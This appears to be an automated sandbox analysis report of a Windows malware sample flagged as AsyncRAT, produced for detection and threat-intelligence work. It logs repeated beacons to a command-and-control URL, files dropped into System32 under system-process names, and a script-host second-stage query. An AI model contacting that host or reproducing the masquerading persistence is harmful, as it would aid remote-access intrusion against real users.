Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ru

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=Gb5QEAcb2lnXy25yoCy5xgkBs4Uh HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: a0583448.xsph.ru
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1Host: a0583448.xsph.ru

Source: unknown

DNS traffic detected: queries for: a0583448.xsph.ru

Source: ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru
Source: ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/
Source: ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?KMDfBfgHv81LMaroKzx8Ebu8=FR&AVW=s9W2tFAsz&c43ad04a366e3e13d187a2
Source: dllhost.exe, 00000011.00000002.1840393239.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.1840393239.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.1839622288.00000000010E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?ONO2h=oTi2jQtd0UQ41CWGWbngEd&baoAocY3YSOpiO=m8ePhn50mSuH0xP&mL=G
Source: WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0583448.xsph.ru/HttpCpu.php?t9XuiM8Z=c9QFyXales&bCcrpzpHaLyQDva2=SBrtO0pOu&9pYw=qiwrhpF&c43a
Source: perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1695236330.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000C.00000002.1721033162.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.1840393239.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, ZyNSmFTtlPIEeiJBfofO.exe, 00000012.00000002.1923136435.0000000002D28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: perfCrtmonitorsvcMonitorDll.exe, 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_0071718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_0071718C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\ddraw	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\ddraw\dllhost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\ddraw\5940a34987c99120d96dace90a3f93f329dcad63	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\wbem\schannel	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	File created: C:\Windows\System32\wbem\schannel\24dbde2999530ef5fd907494bc374d663924116c	Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071857B	0_2_0071857B
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071407E	0_2_0071407E
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0073D00E	0_2_0073D00E
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_007270BF	0_2_007270BF
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00741194	0_2_00741194
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_007302F6	0_2_007302F6
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071E2A0	0_2_0071E2A0
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00713281	0_2_00713281
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00726646	0_2_00726646
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0073473A	0_2_0073473A
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0073070E	0_2_0073070E
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_007127E8	0_2_007127E8
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_007237C1	0_2_007237C1
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071E8A0	0_2_0071E8A0
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071F968	0_2_0071F968
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00734969	0_2_00734969
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00726A7B	0_2_00726A7B
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00723A3C	0_2_00723A3C
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0073CB60	0_2_0073CB60
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00730B43	0_2_00730B43
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00725C77	0_2_00725C77
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00723D6D	0_2_00723D6D
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071ED14	0_2_0071ED14
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0072FDFA	0_2_0072FDFA
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071DE6C	0_2_0071DE6C
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_0071BE13	0_2_0071BE13
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00730F78	0_2_00730F78
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: 0_2_00715F3C	0_2_00715F3C

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: String function: 0072ED00 appears 31 times
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: String function: 0072E360 appears 52 times
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Code function: String function: 0072E28C appears 35 times

Source: PMDfwr7Jal.exe, 00000000.00000002.1625417160.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000002.1625417160.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624790702.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624790702.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624630598.0000000002F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624630598.0000000002F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624838805.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe, 00000000.00000003.1624838805.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs PMDfwr7Jal.exe
Source: PMDfwr7Jal.exe	Binary or memory string: OriginalFilenametelescop.exe$ vs PMDfwr7Jal.exe

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
